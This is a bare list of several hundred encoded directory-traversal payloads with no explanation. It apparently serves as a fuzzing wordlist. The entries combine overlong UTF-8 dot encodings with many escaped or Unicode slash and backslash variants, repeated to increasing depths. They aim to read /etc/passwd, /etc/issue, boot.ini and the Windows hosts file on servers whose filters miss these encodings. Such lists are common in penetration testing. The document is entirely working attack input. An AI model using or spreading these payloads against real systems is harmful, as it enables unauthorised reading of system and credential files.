-%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216%c0%2e%c0%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%2e%c0%2e%uEFC8etc%uEFC8passwd -%c0%2e%c0%2e%uEFC8etc%uEFC8issue -%c0%2e%c0%2e%uEFC8boot.ini -%c0%2e%c0%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8etc%uEFC8passwd -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8etc%uEFC8issue -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8boot.ini -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8etc%uEFC8passwd -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8etc%uEFC8issue -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8boot.ini -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8etc%uEFC8passwd -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8etc%uEFC8issue -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8boot.ini -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8etc%uEFC8passwd -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8etc%uEFC8issue -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8boot.ini -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8etc%uEFC8passwd -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8etc%uEFC8issue -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8boot.ini -%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8%c0%2e%c0%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%2e%c0%2e%uF025etc%uF025passwd -%c0%2e%c0%2e%uF025etc%uF025issue -%c0%2e%c0%2e%uF025boot.ini -%c0%2e%c0%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025etc%uF025passwd -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025etc%uF025issue -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025boot.ini -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025etc%uF025passwd -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025etc%uF025issue -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025boot.ini -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025etc%uF025passwd -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025etc%uF025issue -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025boot.ini -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025etc%uF025passwd -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025etc%uF025issue -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025boot.ini -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025etc%uF025passwd -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025etc%uF025issue -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025boot.ini -%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025%c0%2e%c0%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%2e%c0%2e%%32%%66etc%%32%%66passwd -%c0%2e%c0%2e%%32%%66etc%%32%%66issue -%c0%2e%c0%2e%%32%%66boot.ini -%c0%2e%c0%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66etc%%32%%66passwd -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66etc%%32%%66issue -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66boot.ini -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66etc%%32%%66passwd -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66etc%%32%%66issue -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66boot.ini -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66etc%%32%%66passwd -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66etc%%32%%66issue -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66boot.ini -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66etc%%32%%66passwd -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66etc%%32%%66issue -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66boot.ini -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66etc%%32%%66passwd -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66etc%%32%%66issue -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66boot.ini -%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66%c0%2e%c0%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%2e%c0%2e%%35%%63etc%%35%%63passwd -%c0%2e%c0%2e%%35%%63etc%%35%%63issue -%c0%2e%c0%2e%%35%%63boot.ini -%c0%2e%c0%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63etc%%35%%63passwd -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63etc%%35%%63issue -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63boot.ini -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63etc%%35%%63passwd -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63etc%%35%%63issue -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63boot.ini -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63etc%%35%%63passwd -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63etc%%35%%63issue -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63boot.ini -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63etc%%35%%63passwd -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63etc%%35%%63issue -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63boot.ini -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63etc%%35%%63passwd -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63etc%%35%%63issue -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63boot.ini -%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63%c0%2e%c0%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%2e%c0%2e%e0%80%afetc%e0%80%afpasswd -%c0%2e%c0%2e%e0%80%afetc%e0%80%afissue -%c0%2e%c0%2e%e0%80%afboot.ini -%c0%2e%c0%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afetc%e0%80%afpasswd -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afetc%e0%80%afissue -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afboot.ini -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afetc%e0%80%afpasswd -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afetc%e0%80%afissue -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afboot.ini -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afetc%e0%80%afpasswd -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afetc%e0%80%afissue -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afboot.ini -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afetc%e0%80%afpasswd -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afetc%e0%80%afissue -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afboot.ini -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afetc%e0%80%afpasswd -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afetc%e0%80%afissue -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afboot.ini -%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%af%c0%2e%c0%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%2e%c0%2e%25c1%259cetc%25c1%259cpasswd -%c0%2e%c0%2e%25c1%259cetc%25c1%259cissue -%c0%2e%c0%2e%25c1%259cboot.ini -%c0%2e%c0%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cetc%25c1%259cpasswd -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cetc%25c1%259cissue -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cboot.ini -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cetc%25c1%259cpasswd -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cetc%25c1%259cissue -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cboot.ini -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cetc%25c1%259cpasswd -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cetc%25c1%259cissue -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cboot.ini -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cetc%25c1%259cpasswd -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cetc%25c1%259cissue -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cboot.ini -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cetc%25c1%259cpasswd -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cetc%25c1%259cissue -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cboot.ini -%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259c%c0%2e%c0%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%2e%c0%2e%25c0%25afetc%25c0%25afpasswd -%c0%2e%c0%2e%25c0%25afetc%25c0%25afissue -%c0%2e%c0%2e%25c0%25afboot.ini -%c0%2e%c0%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afetc%25c0%25afpasswd -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afetc%25c0%25afissue -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afboot.ini -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afetc%25c0%25afpasswd -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afetc%25c0%25afissue -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afboot.ini -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afetc%25c0%25afpasswd -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afetc%25c0%25afissue -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afboot.ini -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afetc%25c0%25afpasswd -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afetc%25c0%25afissue -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afboot.ini -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afetc%25c0%25afpasswd -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afetc%25c0%25afissue -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afboot.ini -%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25af%c0%2e%c0%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%2e%c0%2e%f0%80%80%afetc%f0%80%80%afpasswd -%c0%2e%c0%2e%f0%80%80%afetc%f0%80%80%afissue -%c0%2e%c0%2e%f0%80%80%afboot.ini -%c0%2e%c0%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afetc%f0%80%80%afpasswd -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afetc%f0%80%80%afissue -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afboot.ini -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afetc%f0%80%80%afpasswd -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afetc%f0%80%80%afissue -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afboot.ini -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afetc%f0%80%80%afpasswd -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afetc%f0%80%80%afissue -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afboot.ini -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%af%c0%2e%c0%2e%f0%80%80%afetc%f0%80%80%afpasswd 